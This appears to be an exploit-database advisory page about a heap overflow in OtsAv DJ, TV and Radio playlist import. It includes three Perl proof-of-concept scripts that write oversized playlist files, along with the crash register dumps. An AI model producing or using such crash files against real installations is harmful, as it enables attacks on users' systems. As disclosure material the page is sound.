OtsAv DJ & TV [.olf] Local Heap Overflow Poc

vendor:

OtsAv DJ & TV

by:

Mountassif Moad a.k.a Stack

7,8

CVSS

HIGH

Heap Overflow

122

CWE

Product Name: OtsAv DJ & TV

Affected Version From: OtsAv DJ & TV prior to version 1.85.076

Affected Version To: OtsAv DJ & TV version 1.85.076 and earlier

Patch Exists: YES

Related CWE: N/A

CPE: a:otszone:otsav_dj

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

OtsAv DJ & TV [.olf] Local Heap Overflow Poc

OtsAv DJ & TV are vulnerable to a local heap overflow vulnerability. An attacker can exploit this vulnerability by creating a malicious .olf file containing a large number of 'A' or '45' characters and then importing it as a playlist. This will cause a heap overflow and can lead to arbitrary code execution.

Mitigation:

Users should update to the latest version of OtsAv DJ & TV to ensure that they are not vulnerable to this exploit.

Source

Exploit-DB raw data:

----------------------------------the first Poc------------------------------------
#!/usr/bin/perl
# OtsAv DJ [.olf] Local Heap Overflow Poc
# Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe
# Desc : 7000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# register of 7000 A'
# EAX 41414141
# ECX 00E5448C OtsAVDJt.00E5448C
# EDX 41414141
# EBX 00E54488 OtsAVDJt.00E54488
# ESP 02C6FE1C
# EBP 00E0D328 OtsAVDJt.00E0D328
# ESI 00000000
# EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EIP 0046266C OtsAVDJt.0046266C
# register of 2000 A'
# EAX 41414141
# ECX 00001B05
# EDX 02FAF730
# EBX 0000042A
# ESP 02FAF9C8
# EBP 00000000
# ESI 020FAFEA
# EDI 02FAFEAA
# EIP 0043C8D7 OtsAVDJt.0043C8D7
use strict;
use warnings;
my $A= "\x41" x 7000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
-------------------------------Second Poc-----------------------------------------------------

#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
----------------------------------- 3 POC-------------------------------------------------
#!/usr/bin/perl
# OtsAv Radio [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/radio/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 0000CD32
# EDX 0224F730
# EBX 00000452
# ESP 0224F9C8
# EBP 00000000
# ESI 00C8E0EA
# EDI 0224FED2
# EIP 0043B497 OtsAVRDt.0043B497
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;

# milw0rm.com [2009-07-10]